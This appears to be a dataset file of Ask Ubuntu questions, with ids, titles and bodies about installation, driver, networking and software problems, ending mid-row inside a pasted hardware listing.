453369	what to do if ubuntu 12.04 does not detect windows 7 during installation	i am now facing a problem in installing ubuntu 12.04 lts alongside windows 7 . first of all , here is my pc configuration : intel desktop board db75en , intel i-5 3450 processor , 1 tb western digital hard disk , 6 gb ram , nvidia 8400gs graphics card . firstly i was able to make a dual boot system . but there was a problem in my motherboard with the on board graphics . so i get back to intel and they replace it in 12 days . now i have to do a fresh installation . now i first install windows 7 . when i am going to install ubuntu 12.04 , the `` install ubuntu alongside windows 7 '' option was not there.then i go with the `` try ubuntu '' option . while opening gparted , it shows a 1tb unallocated space in the hard disk . i format again the whole hard drive and make new partition table with windows 7 bootable usb drive and leave a 200gb unallocated space . but it failed with the same option . it failed recognize the previously installed windows 7 . i search the forum ... i ran the command : sudo parted -l and i get the following output : warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? y model : ata wdc wd10ezex-22b ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags model : hp v112b ( scsi ) disk /dev/sdb : 8047mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 31.7kb 8046mb 8046mb primary fat32 boot , lba what should i do ?
453370	usb keyboard not working in the bootloader , but does in bios and os 's	i have windows 8 and ubuntu installed alongside on my computer . however , my usb keyboard does n't seem to work when supposed to navigate the grub menu . this was also a problem when i only had windows 7 . the keyboard works well in my bios and i made sure usb legacy support is enabled there , and i do n't have any problems using my usb keyboards in the os 's . to complicate the matter , my keyboard only works sometimes , but i have no idea how and when they do . did n't have any luck lately . i have 2 keyboards , and the same problem occurs on them both . how do i possibly fix this ? for your information : my mb is intel dh67cl .
453372	suspend is not working after updating to ubuntu 14.04 from 13.10	i am not able to put my laptop to suspend ( sleep ) mode , if i click on suspend it just locks the screen and nothing happens ? i updated my previous version of ubuntu from 13.04 to 13.10 then to 14.04 any idea why this is happening or any work around to fix the issue ? i am using dell vostro 3400 with 64 bit os
453376	ubuntu 14.04 does n't start or shows as a white screen after installing the repositories for connecting to iphone	my sister is using ubuntu 14.04 as the only boot in her notebook megaware with graphics amd raedon . i gave my iphone to my sister , she wanted to connect it to her notebook . i installed some repositories from ubuntu 12.04 and 13.10 indicated by these tutorials : sudo apt-add-repository ppa : ingo/ios7support ( http : //itsfoss.com/mount-iphone-ipad-ios-7-ubuntu-13-10/ ) libimobiledevice2_1.1.6+git20140213~ppa1_i386.deb ( http : //www.omgubuntu.co.uk/2014/03/ios7-ipad-iphone-ubuntu-trust i installed them . i rebooted . ubuntu does n't start and shows as a white and after always black . ubuntu 's hd is cryptographed . what can i do now ? i 'm worried .
453377	how to enable event mpm apache 2.4 on ubuntu 14.04 with thread safe php ?	i upgraded to ubuntu server 14.04 expecting the default apache installation would use the new event mpm , but instead i find the old memory-eating prefork . i 've successfully set up event mpm in arch linux , but i 'm failing to do so on ubuntu . i keep getting : apache is running a threaded mpm , but your php module is not compiled to be threadsafe . you need to recompile php i ' ve already installed php-fpm , and configured apache2 to use it , but since the config files for apache2 are different on ubuntu , i 'm not quite sure whether i 'm doing it on the right place . any idea on how to make php thread safe so i can use apache2 event-mpm ? ( without having to manually recompile php , of course )
453381	hdmi connection to external monitor causes laptop screen blackout in 14.04 , nvidia graphics	i have had some serious issues with my external monitor and graphics display since installing ubuntu 14.04 , and no one else seems to have had the exact same problem so i figured it best to post here . i have a dell vostro 3500 dual-booting windows 7 and ubuntu 14.04 with nvidia 310m hybrid graphics . initial installed drivers with 14.04 caused persistent system program errors after booting , which was rectified by updating my drivers to nvidia-331-updates ( http : //packages.ubuntu.com/trusty/nvidia-331-updates ) . connecting my asus external monitor via vga has given me persistent errors/crashes , so i am trying to get the hdmi connection working as it will hopefully be more stable . unfortunately when i connect the hdmi cable there is no output on the external monitor and my laptop screen immediately turns black , and remains black even after unplugging the hdmi leaving me no option but a hard reset . the hdmi connection works fine in windows 7 under performance mode , which is what i have set in ubuntu but perhaps there are other settings that need adjustment ? guessing this is a graphics hardware/driver issue , which i know very little about so any comments/suggestions/advice in the matter would be greatly appreciated ! thanks in advance : ) edit : here are images of the xserver log file ( in failsafe graphics mode w/ hdmi connected ) : http : //imgur.com/slpuqxt,72fta0i,6hisdyp , dimkobc , quklr89 , txppp5v , knk1yag , zghen4n,4jo53dl , ebtsdj3 # 0 based on the warnings/errors ( img 2 , 7 , 8 ) , seems like directories/files are missing.. does this shed light on my problem ?
453382	upgrade to kubuntu 14.04 hangs at stopping cron	i just attempted to upgrade from kubuntu 13.10 to 14.04 using the muon update utility , but after downloading all required files , the update process stalled with the message `` cron : stopping ... '' after several hours , i rebooted , and the machine booted normally . i attempted to run sudo apt-get -f install to complete the installation process , but once again , the progress stalled with `` cron : stopping ... '' i rebooted once more , and this time , i tried to stop cron manually before doing anything else . the command sudo service cron stop hangs up the same way , with no error message . i 'm not sure why cron is refusing to stop on request . any ideas to get around this problem ?
453383	ubuntu 12.04 server installation issue	i have tried to install ubuntu 12.04 ( 32 & 64 bit ) version on fujitsu primergy rx200s8 server . but at the time of base system installation the server get restarted itself without showing any error . i could n't install ubuntu , why fujitsu server not supported ubuntu . suggest me to solve this issue .
453384	ubuntu 14.04 installation help	i am trying to install ubuntu 14.04 alongside windows 7 . i have a 500gb hard disk partioned in 3 drives . now , i am installing ubuntu using live usb drive . but , i am stuck at the 'installation type '' window . this is what i see , no 3 drives , nothing : what do i do ?
453385	simple method to install to chromebook ?	there seems to be no simple method to install ubuntu to chromebooks , which i know can be done , but it seems like too much hassle . is n't there an easier way ? i do n't want to run them side by side , if anything i 'd like to replace it or at least have a true dualboot with my ubuntu being the primary boot .
453387	where `` .gvfs '' has gone in 14.04	my question is `` simple '' . where can i find a local mount point for the samba shares i 'm connected to . in 12.04 it was located under *home/.gvfs* . thanks in advance for your help . here is my smb.conf file : # ======================= global settings ======================= [ global ] workgroup = mshome server string = % h server ( samba , ubuntu ) dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d encrypt passwords = no obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user usershare allow guests = yes comment = home directories browseable = no read only = no security = user username map = /etc/samba/smbusers [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ red ] comment = red usb disk path = /media/laurent06000/red writeable = yes ; browseable = yes guest ok = yes [ flareget ] path = /home/laurent06000/flareget writeable = yes ; browseable = yes guest ok = yes [ windows ] comment = windows main drive path = /media/windows writeable = yes ; browseable = yes guest ok = yes
453391	can not find my home wifi connection with 14.04 . had a good wifi connection at work	i spend most of last night on the forums trying to find a solution to no avail . i have an acer aspire 5742z . i purged/removed/disabled the broadcom driver . i did an update , i updated the pciids , non-freelinux firmware , black listed about anything people suggested i black listed etc ... the connection works on windows , i run dual-boot and i am able to see it amongst the other connections in my network window . in ubuntu it is simply not in my list . i tried connecting it to a hidden network , my home network uses wpa1 and that choice was not avaible , only wpa2 . do n't know if that has anything to do with it . i copied all the information but through hidden it also did n't work . do n't know what i am doing wrong , i just want this connection to show up in my list and connect to it . it theoretically should work , i am 2,5 meters away from the router , my microsoft os recognizes it and connects but ubuntu does n't . any help is appreciated , thanks .
453392	haproxy failed to start	haproxy is configured to use as load balancer for geoserver i followed the procedure explained in this http : //geoserver.geo-solutions.it/edu/en/clustering/apache/haproxy.html page and i edited haproxy.cfg as global log 127.0.0.1 local0 notice maxconn 2000 user haproxy group haproxy daemon frontend http-in bind *:88 default_backend geoserver timeout client 1m backend geoserver mode http balance roundrobin server geoserver_1 localhost:8080/geoserver maxconn 1000 cookie 1 check port 8080 server geoserver_2 localhost:8081/geoserver maxconn 1000 cookie 2 check port 8081 timeout connect 10s timeout server 1m listen admin bind *:8088 mode http stats enable stats uri /haproxy ? stats timeout connect 10s timeout client 1m timeout server 1m when i tried to start i getting the following error * starting haproxy haproxy [ alert ] 112/171316 ( 5193 ) : starting frontend http-in : can not bind socket [ fail ] really am stuck here please help me
453393	virtualbox fails with `` implementation of the usb 2.0 controller not found '' after upgrading to 2014.04	since upgrading to ubuntu 2014.04 , when i launch my virtualbox virtual machine i get : failed to open a session for the virtual machine win7pro32bit . implementation of the usb 2.0 controller not found ! because the usb 2.0 controller state is part of the saved vm state , the vm can not be started . to fix this problem , either install the 'oracle vm virtualbox extension pack' or disable usb 2.0 support in the vm settings ( verr_not_found ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 8ab7c520-2442-4b66-8d74-4ff1e195d2b6 } the solution to the same question for 2012.10 does not fix the problem : sudo apt-get purge virtualbox sudo apt-get autoremove sudo apt-get update sudo apt-get install virtualbox
453397	prevent network card disabled on suspend	since upgrading to 14.04 i can no longer wake on lan my laptop . this is because the network card seems to be disabled when i suspend ubuntu . is there anyway i can prevent this from happening ?
453400	problem : : enable ssh for hadoop with new key	i followed michael noll 's tutorial for installing hadoop , i created hadoop user as 'hduser ' and generated key , but i am stuck in here , when i try to enable ssh access with generated key by using , hduser @ arul-virtual-machine : ~ $ cat $ home/ .ssh/id_rsa.pub > > $ home/ .ssh/authorized_keys and i got response as , -su : /home/hduser/ : is a directory i am using vmware workstation with ubuntu 14.04 .
453401	can not access internet after 14.04 upgrade	i upgraded from 13.10 to 14.04 a couple of days ago via internet using `` sudo apt-get upgrade '' . after the upgrade , both my wired connection and wireless connection stopped talking to the internet when using firefox or chrome . i do not have any problem exchanging files with another pc ( running ubuntu 10.04 ) use filezilla within the same network and am able to use firefox to log into my router to check configuration . what is so strange was the system appeared to be able to reach out to internet to download files when i run `` sudo apt-get update '' . i am really baffled by this . any help to get me back my internet access for both wired/wireless connections would be appreciated . here 's some information about my settings ( wireless intentionally disabled when this snapshot is taken ) : the unit is a thinkpad t60 . ifconfig : eth0 link encap : ethernet hwaddr 00:15:58:7d:17:04 inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :215:58ff : fe7d:1704/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:162 errors:0 dropped:0 overruns:0 frame:0 tx packets:167 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:50700 ( 50.7 kb ) tx bytes:24254 ( 24.2 kb ) interrupt:16 memory : ee000000-ee020000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:228 errors:0 dropped:0 overruns:0 frame:0 tx packets:228 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:57669 ( 57.6 kb ) tx bytes:57669 ( 57.6 kb ) sudo lshw -c network : *-network description : ethernet interface product : 82573l gigabit ethernet controller vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 00 serial : 00:15:58:7d:17:04 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=0.5-1 ip=192.168.1.102 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : ee000000-ee01ffff ioport:3000 ( size=32 ) *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:18 : de : b8 : b1 : c2 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:47 memory : edf00000-edf00fff route -n ( revised using dhcp ) : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0
453404	set password aging for a group of users	with chage command we can change password expiry information for a user . is there anyway to enforce password aging for a group of users ?
453408	how to install python3.3.5 on ubuntu server 12.10 ?	i need python 3.3.5 on ubuntu server 12.10 . i want to run apt-get install python3 but i am not sure this will lead to python3.3.5 version installation . in other words : how can i install the exact python version i need through the command line ?
453410	gparted showing the whole disk	the title says it all , i do not see any partition but the whole disk . my version is 12.04 lts . i literally have no idea .
453411	ubuntu 14.04 not booting after error message . /tmp could not be mounted	i recently installed ubuntu 14.04 using wubi and after installation when it booted it showed an error : serious errors were found while checking the disk drive for / . there were three options : press [ i ] to ignore , press [ s ] to skip mounting and press [ m ] to mount manually . after i pressed i , it showed /tmp could not be mounted and my ubuntu is n't booting . can anybody please guide me to how to solve this problem and thanks in advance
453412	the disk drive for /mnt/sdc is not ready yet or not present	after adding a new hard disk to my computer i always get this error on startup : i tried to disable automount options with disks and kcmshell4 but the problem persists . how can i solve it ? edit : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > # entry for /dev/sda2 : uuid=da7f24b9-5ae6-47f5-bbaf-07094c5dc9cd / ext4 defaults 0 0 # entry for /dev/sda1 : uuid=721c5dcc6cf6d822 /media/h ntfs-3g defaults , users , locale=en_us.utf-8 0 0 /dev/disk/by-id/usb-ut165_usb2flashstorage_000000000005c8-0:0 /mnt/usb-ut165_usb2flashstorage_000000000005c8-100:0 auto nosuid , nodev , nofail , noauto , x-gvfs-show 0 0 /dev/sdc /mnt/sdc auto nosuid , nodev , nofail , x-gvfs-show , x-udisks-auth 0 0
453414	asus sometimes boot problems	usually my asus notebook boots like it should . all drivers are working , everything runs smooth and i do n't have any problems . however , sometimes it starts with my fan at 100 % , and the battery indicator ( on the front of my notebook ) is blinking orange . the fan stays at 100 % until i power off my notebook , take out the battery and put it back in again . so does the battery indicator . also , the battery indicator applet in ubuntu reports a wrong battery status ( percentage ) when this happens . i never had these problems with windows , and this starts as soon i choose ubuntu from grub . does anyone know what the cause is and how i can fix it ?
453415	how do i get the disk image daily build of the current development version ?	i was wounding how can i tried the daily-build of ubuntu , if development has began ? i want to try it because i like the bleeding edge of software .
453418	when does ubuntu development begins on the next version after the current release ?	when does ubuntu development begins on the next version after the current release ? is it like 2 months after the current release , several weeks ? i am just wondering , since i want the daily build of ubuntu 14.10 if their is some . also , to they release the daily-build the same day that the begin development , or is it like a week ?
453422	removing nepomuk and akonay	now that we have baloo in kde i guess is safe to remove the akonadi and nepomuk , right ? i have upgraded my kubuntu 13.10 to 14.04 without any problem . in the upgrade process , the system removed some packages but not the packages related with akonadi and nepomuk : libnepomuk4 install libnepomukcleaner4 install libnepomukcore4abi1 install libnepomukquery4a install libnepomukutils4 install libnepomukwidgets4 install nepomuk-core-data install nepomuk-core-runtime install akonadi-backend-mysql install akonadi-server install libakonadi-calendar4 install libakonadi-contact4 install libakonadi-kabc4 install libakonadi-kcal4 install libakonadi-kde4 install libakonadi-kmime4 install libakonadi-notes4 install libakonadi-socialutils4 install libakonadiprotocolinternals1 install is it safe to remove this packages ? , do i need to do something more ? my intention is to remove completely akonadi and nepomuk as they are no longer necessary .
453424	ca n't add firefox search engines ( ubuntu 14.04 & firefox 28 )	from the firefox search engine page ( https : //addons.mozilla.org/en-us/firefox/search/ ? atype=4 ) , i get the following error alert message when i click `` + add to firefox '' : sorry , you need a mozilla-based browser ( such as firefox ) to install a search plugin . i 've found 2 temporary solutions so far that work fine , but they 're workarounds and not exactly an answer to as why this is happening : temp solution # 1 is to right-click on the `` + add to firefox '' link , and `` save link as '' the xml file to /usr/lib/firefox-addons/searchplugins and restart firefox . temp solution # 2 use firefox in safe-mode by running firefox -safe-mode in a terminal .
453427	missing header files when installing	i am trying to install mysql-5.5 directly through terminal but i get an header files is missingerror and it fails to install . the problem stays when i run sudo apt-get update/upgrade is ther any way around this problem ?
453431	sudo : editor : command not found	i am trying to install gitlab on my server but when i run this command : sudo -u git -h editor config/gitlab.yml then i get : sudo : editor : command not found cn you guys tell me what is the wrong with this command , i am following this instruction for installing gitlab : https : //github.com/gitlabhq/gitlab-recipes/blob/master/install/centos/readme.md i am not much familiar to linux and ssh commands , so be gentle with me . thanks
453433	ubuntu 12.04 cloud images hang on first boot in virtualbox	i 've run across an annoying bug with the recent official builds of precise ( both 32 and 64 bit versions ) for virtualbox found here : http : //cloud-images.ubuntu.com/vagrant/precise/current/ when these images are booted up the first time they will perpetually hang while booting . here 's how to replicate the issue : vagrant box add precise64-current http : //cloud-images.ubuntu.com/vagrant/precise/current/precise-server-cloudimg-amd64-vagrant-disk1.box vagrant init precise64-current vagrant up now it will start up the server but fail to connect until you do the following ... vagrant halt -f vagrant up ... and now it will work just fine to research this oddity i enabled the virtualbox gui in my vagrantfile and tried it again . on first boot , it appears to load the grub bootloader and then freeze as soon as it attempts to load ubuntu in non-recovery mode . every boot thereafter works just fine . i have replicated this on two machines ( both hosts are osx machines ) . is there anything that can be done to debug this issue or some virtualbox setting that will fix it ?
453435	getting broadcom bc4313 wi-fi to work on ubuntu 12.04 without slowing internet for other devices	i have two laptops on my network , one of which has been running ubuntu 12.04 for several months now without any issues . after getting a virus on the other yesterday , which originally came with windows and uses the broadcom bc4313 chip , i installed ubuntu 12.04 on it and discovered that i either ca n't connect to the internet via wi-fi ( although it works fine via ethernet ) or it 's extremly slow to the point of being unusable . it works fine if i install the wireless sta driver suggested in the additional drivers menu , but then the wi-fi my other ubuntu laptop which has been working just fine so far slows to a crawl ( from 30mb to 1m ) . i 've searched the web for hours but i could n't find a solution that avoids this trade-off ! what am i missing ?
453436	boot-repair ca n't complete a repair under ubuntu gnome 14.04	yesterday i installed ubuntu gnome 14.04 on my computer . the installation program would n't recognize my windows 8.1 installation , but it could see the ntfs-partitions . i figured that i could make the necessary partitions for ubuntu manually , and then later make both systems boot-able with boot-repair . now my computer boots into ubuntu gnome , and i followed this guide https : //help.ubuntu.com/community/boot-repair to install boot-repair with the following commands sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sed 's/trusty/saucy/g ' -i /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) ( notice the trusty/saucy-line , this is because boot-repair ai n't on launchpad for 14.04 yet ) it all went well until boot-repair asks me to insert the following command in a terminal sudo apt-get install -y -- force-yes grub-pc linux after this the terminal says e : unable to locate package linux can anybody tell my why i get this error , and how i should proceed ?
453439	windows doesnt boot up	i had windows xp professional installed and then i installed ubuntu 14.04 lts alongside xp . ubuntu installation went just fine but the problem is , even though i can see the windows option in the boot menu , when i select the option , a blank screen appears , and i ca n't do anything after that . i have gone through the boot-repair route but it does n't seem to solve the problem . thanks in advance .
453440	missing system settings in ubuntu 14.04 after customization	while playing with ubuntu 14.04 , i installed or uninstalled some packages . i do not even remember what i was doing . as a result , now i ca n't see most of the system settings in settings window . any idea how to solve this problem . ohh yes , and when i hover mouse over the window title , it shows 'unknown application name' i must have removed something , not sure what : - )
453444	bash : ./sublime_text : no such file or directory	after installing sublime text 3 on ubuntu 14.04 by coping the extracted files to /opt , i tried running sublime text using ./sublime_text . however it is giving an error no such file or directory when though ls tells us that it exists ! what 's going on ? x @ x-ubuntu : /opt/sublime_text_3 $ ls -l total 11660 -rw-rw-r -- 1 x x 4696 dec 16 22:28 changelog.txt -rwxrwxr-x 1 x x 171056 dec 16 22:28 crash_reporter drwxrwxr-x 7 x x 4096 dec 16 22:28 icon drwxrwxr-x 2 x x 4096 dec 16 22:28 packages -rwxrwxr-x 1 x x 4172952 dec 16 22:28 plugin_host -rw-rw-r -- 1 x x 2582934 dec 16 22:28 python3.3.zip -rw-rw-r -- 1 x x 18883 dec 16 22:28 sublime_plugin.py -rw-rw-r -- 1 x x 30672 dec 16 22:28 sublime.py -rwxrwxrwx 1 x x 4932736 dec 21 21:57 sublime_text -rw-rw-r -- 1 x x 532 dec 16 22:28 sublime_text.desktop x @ x-ubuntu : /opt/sublime_text_3 $ ./sublime_text bash : ./sublime_text : no such file or directory
453447	basic ftp not working in nautilus 3.10.1	there 's a public ftp site that works fine other means ( firefox , filezilla , etc ) but not with nautilus ' 'connect to server ' feature . here 's the url : ftp : //ftp.funet.fi/pub/standards/rfc sftp however works fine . can anyone tell me why it wo n't work ? the message i get is `` unhandled error message : socksv4 does not support ipv6 address '2001:708:10:9 : :20:2 ' ''
453449	error installing oci8 on ubuntu 14.04	i 've just upgraded my vm to ubuntu 14.04 , and my oci8 php driver has stopped working . i 've tried to install/upgrade it , but it does n't work . that 's the error messages i get : marc @ sf2 : /build/buildd/php5-5.5.9+dfsg/pear-build-download $ sudo pecl install oci8 downloading oci8-2.0.8.tgz ... starting to download oci8-2.0.8.tgz ( 190,854 bytes ) ... ... ... ... ... ... ... ... ... ... ... ... ... ..done : 190,854 bytes could not extract the package.xml file from `` /build/buildd/php5-5.5.9+dfsg/pear-build-download/oci8-2.0.8.tgz '' download of `` pecl/oci8 '' succeeded , but it is not a valid package archive error : can not download `` pecl/oci8 '' download failed install failed i 've `` untared '' the file oci8-2.0.8.tgz without problems and the package.xml is there ... what can i do to fix this ? must i revert to ubuntu 13.10 ? because i need oci8 for my job to be done ... thanks for your help ! edit : i 've found the problem : pecl is n't working on ubuntu 14.04 and oci8 must be installed from source or using a phar package . i 'm still looking for information about how to install it . edit 2 : i 've found it ! download and extract the oci8 library from pecl repository ( http : //pecl.php.net/package/oci8 ) run the `` phpize '' command to create the build scripts with the instantclient installed , run `` ./configure -with-oci8=shared , instantclient , $ oracle_home '' finally , run a `` make install '' and `` /etc/init.d/apache2 restart '' all this information is taken from the php oci8 installation guide ( php.net/manual/en/oci8.installation.php )
453450	how to configure xstartup of vnc to see ubuntu desktop in vnc viewer ? thanks	how to configure xstartup of vnc to see ubuntu desktop in vnc viewer ? thanks . unity is required as i know . need unity-2d ? thanks .
453451	acer aspire e1-571g freezes often	i am running ubuntu 14.04 final beta on my machine posting output of lshw results : acer description : notebook product : aspire e1-571g ( aspire e1-571g_064a_v2.21 ) vendor : acer version : v2.21 serial : nxm7csi001320008f53400 width : 32 bits capabilities : smbios-2.7 dmi-2.7 smp-1.4 smp configuration : chassis=notebook cpus=1 family=type1family sku=aspire e1-571g_064a_v2.21 uuid=e94a8302-b47b-11e2-b888-20898477445c *-core description : motherboard product : ea50_hc_hr vendor : acer physical id : 0 version : type2 - board version serial : nbm6b110013190a64d3400 slot : type2 - board chassis location *-firmware description : bios vendor : insyde corp. physical id : 0 version : v2.21 date : 12/16/2013 size : 128kib capacity : 3520kib capabilities : pci upgrade shadowing cdboot bootselect edd int13floppynec int13floppytoshiba int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int9keyboard int10video acpi usb biosbootspecification uefi *-cpu description : cpu product : intel ( r ) core ( tm ) i3-2348m cpu @ 2.30ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.10.7 serial : 0002-06a7-0000-0000-0000-0000 slot : u3e1 size : 800mhz capacity : 4ghz width : 64 bits clock : 100mhz capabilities : x86-64 boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=2 enabledcores=2 id=3 threads=4 *-cache:0 description : l1 cache physical id : b slot : l1 cache size : 32kib capacity : 32kib capabilities : internal write-through instruction *-cache:1 description : l2 cache physical id : c slot : l2 cache size : 256kib capacity : 256kib capabilities : internal write-through unified *-cache:2 description : l3 cache physical id : d slot : l3 cache size : 3mib capacity : 3mib capabilities : internal write-back unified *-logicalcpu:0 description : logical cpu physical id : 3.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 3.2 width : 64 bits capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 3.3 width : 64 bits capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 3.4 width : 64 bits capabilities : logical *-logicalcpu:4 description : logical cpu physical id : 3.5 width : 64 bits capabilities : logical *-logicalcpu:5 description : logical cpu physical id : 3.6 width : 64 bits capabilities : logical *-logicalcpu:6 description : logical cpu physical id : 3.7 width : 64 bits capabilities : logical *-logicalcpu:7 description : logical cpu physical id : 3.8 width : 64 bits capabilities : logical *-logicalcpu:8 description : logical cpu physical id : 3.9 width : 64 bits capabilities : logical *-logicalcpu:9 description : logical cpu physical id : 3.a width : 64 bits capabilities : logical *-logicalcpu:10 description : logical cpu physical id : 3.b width : 64 bits capabilities : logical *-logicalcpu:11 description : logical cpu physical id : 3.c width : 64 bits capabilities : logical *-logicalcpu:12 description : logical cpu physical id : 3.d width : 64 bits capabilities : logical *-logicalcpu:13 description : logical cpu physical id : 3.e width : 64 bits capabilities : logical *-logicalcpu:14 description : logical cpu physical id : 3.f width : 64 bits capabilities : logical *-logicalcpu:15 description : logical cpu physical id : 3.10 width : 64 bits capabilities : logical *-cache description : l1 cache physical id : a slot : l1 cache size : 32kib capacity : 32kib capabilities : internal write-through data *-memory description : system memory physical id : 1a slot : system board or motherboard size : 4gib *-bank:0 description : dimm [ empty ] product : empty vendor : empty physical id : 0 serial : empty slot : dimm0 *-bank:1 description : dimm [ empty ] product : empty vendor : empty physical id : 1 serial : empty slot : dimm1 *-bank:2 description : sodimm ddr3 synchronous 1600 mhz ( 0.6 ns ) product : am1u16bc4p2-b19b vendor : a-data technology physical id : 2 serial : 00004546 slot : dimm1 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:3 description : dimm [ empty ] product : empty vendor : empty physical id : 3 serial : empty slot : dimm3 *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:2000 ( size=4096 ) memory : b2000000-b2ffffff ioport : a0000000 ( size=301989888 ) *-display description : vga compatible controller product : gf117m [ geforce 610m/710m/820m / gt 620m/625m/630m/720m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : driver=nvidia latency=0 resources : irq:51 memory : b2000000-b2ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:2000 ( size=128 ) *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : b3000000-b33fffff memory : c0000000-cfffffff ioport:3000 ( size=64 ) *-usb:0 description : usb controller product : 7 series/c210 series chipset family usb xhci host controller vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:41 memory : b3600000-b360ffff *-communication description : communication controller product : 7 series/c210 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:43 memory : b3614000-b361400f *-usb:1 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : b3619000-b36193ff *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:45 memory : b3610000-b3613fff *-pci:1 description : pci bridge product : 7 series/c210 series chipset family pci express root port 